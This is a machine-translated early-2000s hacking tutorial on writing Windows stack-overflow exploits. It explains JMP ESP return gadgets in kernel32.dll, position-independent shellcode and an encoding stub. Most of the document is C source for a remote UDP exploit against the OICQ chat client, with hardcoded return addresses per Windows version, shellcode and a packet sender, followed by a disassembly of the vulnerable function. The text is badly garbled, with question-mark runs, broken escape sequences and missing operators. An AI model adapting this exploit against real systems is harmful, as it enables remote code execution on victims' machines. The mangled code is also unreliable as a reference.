Writing skills under Windows
Author: Yuan brother
Mail: yuan@163.net
?
?? I saw some windows's overflow programs, I didn't have enough unity, perfect, and decided to make a relatively unified writing method, trying to solve some problems.
?
1, JMP ESP problem.
?????? In order to use the KernerL32 in order to unify it. DLL code because at least the same system Kernel32. The DLL module load address may be small,
Other modules may differ from different load addresses with the installation application software, and its module installation is Kernel32. DLL is in front, behind
The module installation address changes with the changes in the front module, so it is still decided to use kernel32. DLL is relatively unified (that is, different versions of the same system
). Solved the JMP ESP (FF E4) code can't find a problem, increase the use
?????? push eSP? (54)
??????. . . .
?????? RET ?????? (C3)
??????or
?????? push eSP? (54) ??????????
??????. . . .
?????? RET 00XX? (C2 XX 00) (RET NUM, NUM is best not too big, so do limit NUM = 00xx)
?????? code, this can be found. "..." is a few non-statements, but it does not affect the function.
?????? You can use it if you find a code:
????????? push ESP
????????? and? Al, 08
????????? RET? 10
????? Selection principle try to use the modules available in front of the module because the same may be large in front of the different versions.
????? Because 9X and NT system module loading addresses are very different, it is impossible to unify this method. I saw Winnt, win2000 actually
Kernel32. The loading address of the DLL is different, it is a bit. . . . Which program of the specific program can try to find JMP ESP in that program.
But this address is usually 0x00xxxxxx, so there is a problem. Can this identify the system to attack the system in the program? The following program is
Using macro.
?
2. Solve the writing of shellcode.
???? The original many programs have shellcode to write it in the form of "/ xaa / XBB", one is not good, there is still a good look.
What is shellcode. So the idea is written together with the shellcode and overflow. This is a bit a little requirement for shellcode writing.
It is required that the shellcode code is a movable code, which is the entire code address moves as usual. In order to reduce the incompatibility, the function calls the address is also used.
LoadLibrary and getProcadDress get, so shellcode relies only to these two parameters. In fact, these two parameters can also be in memory
Found in Kernel32. DLL module, then generate the table you get the address according to the function. That just have JMP ESP addresses in WinNT, Win200, Win9x
There is no uniform under.
???? The prototype written in the program has been roughly written. There are a few questions now:
????? First, determine the shellcode function code address, directly specifying the address of a JMP shellcode, should have a method directly.
????? II. Shellcode often has a call to the _chkesp, which can be used to write to write or find the Call _chkesp inside.
The code is filled with NOP. ?
3, shellcode characters often have requirements, decide to encode the shellcode, add a small piece of code to Shellcode, encoding as the requirements
Shellcode, which reduces the requirements written for Shellcode. Different requirements mainly rewrite this small encoding code.
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
?
/ * ?? OICQ 199B build 0220 ?? overflow program
????? Copy by Yuange
? 2000.04.18
????? new version 0410 has a stack overflow, use this program to attack, but can not perform Sellcode
* / ??
?
#include
#include
#include
#define? Nukewin2000
/ / # define? nukewin9x
#ifdef ???? nukewin2000
#define? reteipaddr ??? Eipwin2000
#define? loadLibraryFnaddress ??? 0x77e78023? // 0x77e60000 0x00018023? loadingLibrary
#define? getProcaddressFnaddress 0x77e7564b? // 0x77e60000 0x0001564B? getProcAddress
#ELSE
??? # ifdef ?? nukewin9x
??? # define? reteipaddr ??? Eipwin9x
??? # define? loadingLibraryFnaddress ??? 0xBff77750? // 0xBFF70000 0x00007750? loadingLibrary
??? # define? getProcaddressFnaddress 0xBff76e28? // 0xBFF70000 0x0000006E28? getProcAddress
??? # else
??? # define? reteipaddr ??? Eipwinnt
??? # define? loadLibraryFnaddress ??? 0x77ee391a? // 0x77ed0000 0x0001391a? loadingLibrary
??? # define? getProcaddressFnaddress 0x77ee4111? // 0x77ed0000 0x00014111? getProcAddress
??? # Endif
#ENDIF
#define? Nopcode ??? 0x90
#define? buffsize ?? 0x2000
#define? OICQPort ?? 4000
#DEFINE? OICQOVERADD 7 0x41C
#define? Overadd ??? OICQOVERADD
#define? STR0 0
#define? STR1 11
#define? STR2 23
#define? STR3 33
#define? STR4 39
#define? STR5 51
?
Void ???? shellcodefnlock ();
VoID ???? shellcodefn ();
Void ???? Cleanchkesp (Char * fnadd, char * shellbuff, char * chkespadd, int LEN)
?
INT main (int Argc, char ** argv)
{
?? char * server;
?? char * str = "user32.dll" "/ x0" "" "" / x0 "" / x0 "" "" "" "/ x0" "/ x0" "" "" / x0 "; ?? char buff1 [] =" / x02 / x01 / x07 / x00 / x78 / x11 / x22 / x33 / x33 / x1f / x30 / x1f / x37 / x35 / x1f "2000-4-10" "/ x1f" 12:00:00 "" / x1f ";
?? / * OICQ udp head * /
?
?? // 0x77ed0000 0x1ddd4 ?? kernel32.dll ?? //? Push ESP ?? //? And al, 08 ?? //? RET 0C
?????? = "/ xd4 / xdd / xee / x77"; ???? // 0x77ed0000 0x0001ddd4
?
???? Eipwin2000 []? = "/ x77"; ???? // 0x77e60000 0x000217EA
?? //? kernel32.dll ???? //? Push ESP ????????? //? and al, 08 ????????? //? RET 0C
?
?? // 0x77e2e32a user32.dll JMP ESP
?? char? Eip2win2000 [] = "/ x2a / xe3 / xe2 / x77";? // 0x77df0000 0x0003E32A
?????? = "/ xd9 / x6a / xf7 / xbf";? // 0xBFF70000 0x00006AD9
?? //? Kernel32.dll ???? 4.10.2184 ???????????????? 0xBFF70000 0x0006AD9
?? // push ESP ????? // and al, 0x10; ??? // RET 0x10;
??
?? CHAR ??? buff [buffsize];
?? char ??? shellcodebuff [0x1000];
?? Struct? SockAddr_in s_in2, s_in3;
?? Struct? hostent * he;
?? char ??? * shellcodefnadd, * chkespadd;
?? unsigned? int sendpacketlong;
?? UNSIGNED? INT I, J, K;
?? unsigned? char TEMP;
?? int ???? fd;
?? u_short port, port1;
?? Socket? D_IP;
?? WSAData Wsadata;
??
?? int result = WSAStartup (MakeWord (1, 1), & WSADATA);
?? IF (result! = 0) {
???????? fprintf (stderr, "Your Computer Was NOT Connected"
???????????? "to the internet at the time That"
???????????? "this program Was launched, or you"
???????????? "" Do Not Have A 32-bit "
???????????? "" ""); ???????? EXIT (1);
????}
?
?? IF (Argc <2)
?? {
??????? wsacleanup ();???
??????? fprintf (stderr, "/ n nuke oicq ./n copy by yuan 2000.4.1. / n Wellcome to my homepage http://yuane.yeah.net.");
??????? fprintf (stderr, "/ n usage:% s
[port] / n ", argv [0]);
??????? EXIT (1);
??}
?? Else? Server = argv [1];
?
?? D_IP = inet_addr (server);
?? IF (D_IP == - 1) {
????? he = gethostByname (Server);
????? if (! he)
????? {
??????? wsacleanup ();
??????? printf ("/ n can't get the ip of% s! / n", server);
??????? EXIT (1);????
?????}
????? Else ??? Memcpy (& D_IP, He-> H_ADDR, 4);
??} ????
?? IF (argc> 2) port = atoi (Argv [2]);
?? Else port = OICQPORT;
?? IF (port == 0) port = OICQPORT;
?
?? fd = socket (AF_INET, SOCK_DGRAM, 0);
?? I = 8000;
?? Setsockopt (FD, SOL_Socket, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i));
?? s_in2.sin_family = af_INet;
?? IF (argc> 3) Port1 = ATOI (Argv [3]);
?? Else port1 = OICQPORT;
?? IF (port1 == 0) port1 = OICQPORT;
?? s_in2.sin_port = htons (port1);
?? S_IN2.SIN_ADDR.S_ADDR = 0;
??????????
?? s_in3.sin_family = af_INet;
?? s_in3.sin_port = htons (port);
?? s_in3.sin_addr.s_addr = d_ip;
?? Bind (FD, (const struct sockaddr far *) & s_in2, sizeof (struct sockaddr_in);
?? Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_PORT));
?
?? MEMSET (BUFF, NOPCODE, BUFFSIZE);
?? Memcpy (buff, buff1, 37);
?
?? _ asm {
????????? MOV ESI, ESP
????????? CMP ESI, ESP
??}
?? _ chkesp ();
?? chuestspadd = _chkesp;
?? Temp = * Chuest;
?? IF (temp == 0xe9) {
????????? chuesthant
// ???????? (int *) i = (int *) * chuestsis;
????????? _ asm {
????????????? MOV EDI, DWORD PTR [Chkespadd]
????????????? MOV EDI, [EDI]
????????????? MOV I, EDI
?????????}
????????? chkespadd = i;
????????? chkespadd = 4;
??}
?
?? shellcodefnadd = shellcodefnlock;
?? Temp = * shellcodefnadd;
?? IF (temp == 0xe9) {
????????? shellcodefnadd;
// ???????? (int *) k = (int *) * shellcodefnadd;
????????? _ asm {
????????????? MOV EDI, DWORD PTR [shellcodefnadd]
????????????? MOV EDI, [EDI]
????????????? MOV K, EDI
?????????}
????????? shellcodefnadd = k;
????????? shellcodefnadd = 4;
??}
?
?? for (k = 0; k <= 0x500; k) {
????????? IF (MELLCODEFNADD K, "/ X90 / X90 / X90 / X90", 4) == 0) Break;
??}
?? Memcpy (buff OverAdd 0x20, Shellcodefnadd K 4, 8);
?????
?? shellcodefnadd = shellcodefn;
?? Temp = * shellcodefnadd;
?? IF (temp == 0xe9) {
?????????? shellcodefnadd;
// ???????? (int *) k = * shellcodefnadd;
??????????? _ asm {
????????????? MOV EDI, DWORD PTR [shellcodefnadd]
????????????? MOV EDI, [EDI]
????????????? MOV K, EDI
?????????}
????????? shellcodefnadd = k;
????????? shellcodefnadd = 4;
??}
??
?? for (k = 0; k <= 0x1000; k) {
????????? IF (MELLCODEFNADD K, "/ X90 / X90 / X90 / X90", 4) == 0) Break;
??}
?
?? Memcpy (shellcodeBuff, shellcodefnadd, k); ?? // j);
?? Cleanchkesp (shellcodefnadd, shellcodebuff, chuestsepadd, k); ????
?
??
?? Memcpy (ShellcodeBuff K, Str, 0x80);
?? SendPacketlong = K 0x80;
?? for (k = 0; k <= 0x200; k) {
????????? IF (MEMCMP (BUFF OVERADD 0x20 K, "/ X90 / X90 / X90 / X90", 4) == 0) BREAK;
??}
?
?? for (i = 0; i
????????? Temp = shellcodebuff [i];
????????? TEMP & = 0xF0;
????????? TEMP = TEMP / 0X10;
????????? TEMP = 0x41;
????????? buff [OVERADD 0x20 K] = TEMP;
????????? k;
????????? Temp = shellcodebuff [i];
????????? TEMP & = 0x0f;
????????? TEMP = 0x41;
????????? buff [OVERADD 0x20 K] = TEMP;
????????? k;
??}
?? Memcpy (buff Overadd, ReteipAddr, 4);
?? SendPacketlong = Overadd 0x20 K 0x10;
?? for (i = 0; i <1; i) {
????? j = rand ();
????? buff1 [0x5] = j;
????? buff1 [0x6] = j 1;
????? j = sendpacketlong;
????? buff [J-1] = 0x03;
????? fprintf (stderr, "/ n send? packet% d bytes.", j);
????? Sendto (FD, BUFF, J, 0, (Const struct sockaddr far *) & s_in3, sizeof (struct sockaddr_in);
??}
?? CloseSocket (FD);
?? wsacleanup ();
?? Return (0);
}
??
Void? shellcodefnlock ()
{
??????? _ asm {
?????????????? NOP
?????????????? NOP
?????????????? NOP
?????????????? NOP
?????????????? jmp ?? Next
Getiadd: ????? pop ?? EDI
?????????????? push? EDI
?????????????? POP ?? ESI
LOOPLOCK: ????? Lodsw
?????????????? SUB ?? AX, 0x4141
?????????????? SHL ?? Al, 4
??????????????????????? xor ?? Al, AH
?????????????? stosb
?????????????? cmp ?? ah, 0x10
?????????????? jb ??? looplock
?????????????? jmp ?? shell
Next: ???????? call? getEDiadd
Shell: ?????????? NOP
?????????????? NOP
?????????????? NOP
?????????????? NOP
????}
}
?
Void shellcodefn ()
{
// ????? const char str [] = "user32.dll" / x0 "" messageboxa "" / x0 "" msvcrtd.dll "" / x0 "" exit ";
???? falproc ????? procloadlib, procgetadd, procg, procexit
????? char ????? * stradd;
???? Handle ???libhandle;
???? proCloadLib? = ???? loadLibraryFnaddress;
???? procgetadd ???? = ???? getProcaddressFnaddress;
?????????? _ ASM
????????? {?????????????????? jmp ??? nextCall
????????? getstradd: ?? pop ??? stradd
????????}
???????? LiBHandle = proCloadLib (stradd str0);
???????? procmsg = procgetadd (libhandle, stradd str1);
???????? procmsg (0, stradd str3, stradd str2 ,0);
// ???????libhandle = proCloadLib (stradd str6);
// ??????? OpenSocketAdd = ProcgetAdd (stradd str7);
???????? libhandle = proCloadLib (Stradd STR4);
???????? procexit = procgetadd (librandle, stradd str5);
???????? procExit (0);
???????? _ asm {
???????? DIE: ???????? jmp? Die ?????????????
???????? nextcall: ??? Call GetStradd
????????????????????? NOP
????????????????????? NOP
????????????????????? NOP
????????????????????? NOP
????????}
}
Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len)
{
??? INT I, K;
??? Unsigned char TEMP;
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
?
??? for (i = 0; i
??????? Temp = shellbuff [i];
??????? if (TEMP == 0xe8) {
// ???????? (int *) k = * (shellbuff i 1);
????????? k = shellbuff i 1;
????????????? _ asm {
?????????????? MOV EDI, K
????????????? MOV EDI, [EDI]
????????????? MOV K, EDI
?????????}
?
????????? Calladd = fnAdd;
????????? Calladd = K;
????????? Calladd = i;
????????? Calladd = 5;
????????? f (calld == chkesp) {
????????????? shellbuff [i] = 0x90;
????????????? shellbuff [i 1] = 0x43; ?? // Inc EBX
????????????? shellbuff [i 2] = 0x4b; ??? // DEC EBX
????????????? shellbuff [i 3] = 0x43;
????????????? shellbuff [i 4] = 0x4b;
?????????}
???????}
???}
}
?
?
?
/ * OICQ has problem code?
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
: 00425D51 837C240800 ????????????? CMP DWORD PTR [ESP 08], 000000
: 00425D56 740C ???????????????????? je 00425d64
: 00425D58 8B01 ?????????????????????????????? MOV EAX, DWORD PTR [ECX]: 00425D5A FF742408 ??????????????? Push [ ESP 08]
: 00425D5E FF90B8000000 ??????????? Call DWORD PTR [EAX 000000B8]
?
* Reference by A (u) Nconditional OR (C) ONDITIONAL JUMP AT ATDRESS:
|: 00425D56 (C)
|
: 00425D64 33c0 ???????????????????? xor Eax, EAX
: 00425D66 C20800 ?????????????????? RET 0008
?
?
: 00425D69 B8E4774900 ????????????? MOV Eax, 004977E4
: 00425D6E E80D700300 ????????????? Call 0045cd80
: 00425D73 81EC10040000 ??????????? SUB ESP, 00000410?
Have overflow YRG 2000.04.18
Buffer size
?
: 00425D79 53 ????????????? Push EBX
: 00425D7A 56 ????????????? Push ESI
: 00425D7B 8B7508 ???????????????????????????? MOV ESI, DWORD PTR [EBP 08]
: 00425D7E 8D85E4FBFFF ??????????? Lea Eax, DWORD PTR [EBP FFFFFBE4]
: 00425D84 57 ????????????? Push EDI
: 00425D85 50 ????????????? push eax
: 00425D86 FF7628 ?????????????????? push [ESI 28]
: 00425D89 8BD9 ????????????????????? MOV EBX, ECX
: 00425D8B FF7624 ?????????????????? push [ESI 24]
: 00425D8E E8C9000000 ????????????? Call 00425E5C
: 00425D93 85C0 ???????????????????? Test Eax, EAX
: 00425D95 0F84B0000000 ??????????? je 00425e4b
: 00425D9B 8D85E8FBFFFF ??????????? LEA EAX, DWORD PTR [EBP FFFFBE8]
: 00425DA1 8D4DF0 ?????????????????? LEA ECX, DWORD PTR [EBP-10]
: 00425DA4 50 ????????????? push eax
: 00425DA5 E8cff10400 ????????????? Call 00474F79
: 00425DAA 8365FC00 ??????????????? And dword PTR [EBP-04] 00000000
: 00425DAE 8BBDE6FBFFF ??????????? MOV EDI, DWORD PTR [EBP FFFFBE6]
: 00425DB4 56 ????????????????????? Push ESI
: 00425DB5 8D4D08 ?????????????????? LEA ECX, DWORD PTR [EBP 08]
: 00425DB8 E8BCF10400 ????????????? Call 00474F79
: 00425DBD 0FB785E4FBFFFF ????????? Movzx Eax, Word PTR [EBP FFFFFBE4]: 00425DC4 8B7620 ????????????????? MOV ESI, DWORD PTR [ESI 20]
: 00425DC7 83E878 ?????????????????? SUB EAX, 00000078
: 00425DCA C645FC01 ??????????????? MOV [EBP-04], 01
: 00425DCE 7434 ???????????????????? JE 00425E04
: 00425DD0 48 ????????????? Dec EAX
: 00425DD1 7560 ???????????????????? JNE 00425E33
: 00425DD3 51 ????????????? push ECX
: 00425DD4 8D45F0 ????????????????? LEA EAX, DWORD PTR [EBP-10]
: 00425DD7 8BCC ???????????????????? MOV ECX, ESP
: 00425DD9 8965EC ?????????????????? MOV DWORD PTR [EBP-14], ESP
: 00425DDC 50 ????????????? push eax
: 00425DDD E89EEE0400 ????????????? Call 00474C80
: 00425DE2 57 ????????????? Push EDI
: 00425DE3 56 ????????????? Push ESI
: 00425DE4 51 ????????????? Push ECX
: 00425DE5 8D4508 ?????????????????? LEA EAX, DWORD PTR [EBP 08]
: 00425DE8 8BCC ???????????????????? MOV ECX, ESP
: 00425DEA 8965E8 ?????????????????? MOV DWORD PTR [EBP-18], ESP
: 00425DED 50 ????????????? push eax
: 00425DEE C645FC03 ??????????????? MOV [EBP-04], 03
: 00425DF2 E889EE0400 ????????????? Call 00474C80
: 00425DF7 8BCB ???????????????????? MOV ECX, EBX
: 00425DF9 C645FC01 ??????????????? MOV [EBP-04], 01
: 00425DFD E8D4030000 ????????????? Call 004261D6
: 00425E02 EB2F ???????????????????? JMP 00425E33
?
* Reference by A (u) Nconditional OR (C) ONDITIONAL JUMP AT ATDRESS:
|: 00425DCE (c)
|
: 00425E04 51 ????????????? Push ECX
: 00425E05 8D45F0 ????????????????? LEA EAX, DWORD PTR [EBP-10]
: 00425E08 8BCC ???????????????? MOV ECX, ESP
: 00425E0A 8965E8 ????????????????? MOV DWORD PTR [EBP-18], ESP
: 00425E0D 50 ????????????? push eax
: 00425E0E E86DEE0400 ????????????? Call 00474C80
: 00425E13 57 ????????????????????? Push EDI: 00425E14 56 ?????????????????????? PUSH ESI
: 00425E15 51 ????????????? Push ECX
: 00425E16 8D4508 ?????????????????? LEA EAX, DWORD PTR [EBP 08]
: 00425E19 8BCC ???????????????????? MOV ECX, ESP
: 00425E1B 8965EC ????????????????? MOV DWORD PTR [EBP-14], ESP
: 00425E1E 50 ????????????? push eax
: 00425E1F C645FC02 ??????????????? MOV [EBP-04], 02
: 00425E23 E858EE0400 ????????????? Call 00474C80
: 00425E28 8BCB ???????????????????? MOV ECX, EBX
: 00425E2A C645FC01 ??????????????? MOV [EBP-04], 01
: 00425E2E E860040000 ????????????? Call 00426293
?
* Reference by A (u) Nconditional OR (C) OONDitional Jump At Addresses:
|: 00425DD1 (C),: 00425E02 (U)
|
: 00425E33 8065FC00 ??????????????? and byte PTR [EBP-04], 00
: 00425E37 8D4D08 ?????????????????? LEA ECX, DWORD PTR [EBP 08]
: 00425E3A E8CCF00400 ?????????????? Call 00474F0B
: 00425E3F 834DFCFF ??????????????? or DWORD PTR [EBP-04], FFFFFFF
: 00425E43 8D4DF0 ?????????????????? LEA ECX, DWORD PTR [EBP-10]
: 00425E46 E8C0F00400 ????????????? Call 00474F0B
?
* Reference by A (u) Nconditional OR (C) ONDITIONAL JUMP AT ATDRESS:
|: 00425D95 (c)
|
: 00425E4B 8B4DF4 ????????????????? MOV ECX, DWORD PTR [EBP-0C]
: 00425E4E 5F ????????????? Pop EDI
: 00425E4F 5E ????????????? Pop ESI
: 00425E50 64890D00000000 ????????? MOV DWORD PTR FS: [00000000], ECX
: 00425E57 5B ????????????? POP EBX
: 00425E58 C9 ????????????? leave
: 00425E59 C20400 ?????????????????? RET 0004
* /
?
??
/ * ???? OICQ message UDP data structure, see Zer9's "OICQ security issues"?
Struct toicqptop
{
CHAR TAG1; // 0x02 // Obviously OICQ protocol number OR version, fixed
CHAR TAG2; // 0x01 // Obviously OICQ's protocol number OR version, fixed
CHAR TAG3; // 0x07
Char tag4; // 0x00
Char tag5; // 0x78
Char tag6; // These two bytes are equivalent to the process ID on UNIX,
CHAR TAG7; // can be assigned casually.
CHAR coICQNUB []; // The sender's OICQ number. EXP: 123456
CHAR CFF; // 0x1f In all OICQ information structure, the split is 0x1f
CHAR Cr; // '0' fixed
CHAR CFF; //
CHAR CE []; // "75", this bit is relatively fixed, which may be an operational way.
CHAR CFF;
Char cdatetime []; // exp: "2000-4-10", 0x1f, "12:00:12", 0x1f
CHAR OUTMSG []; // The message content sent.
CHAR CEND; // 0x03, all OICQ information has been 0x03 to end.
}
* /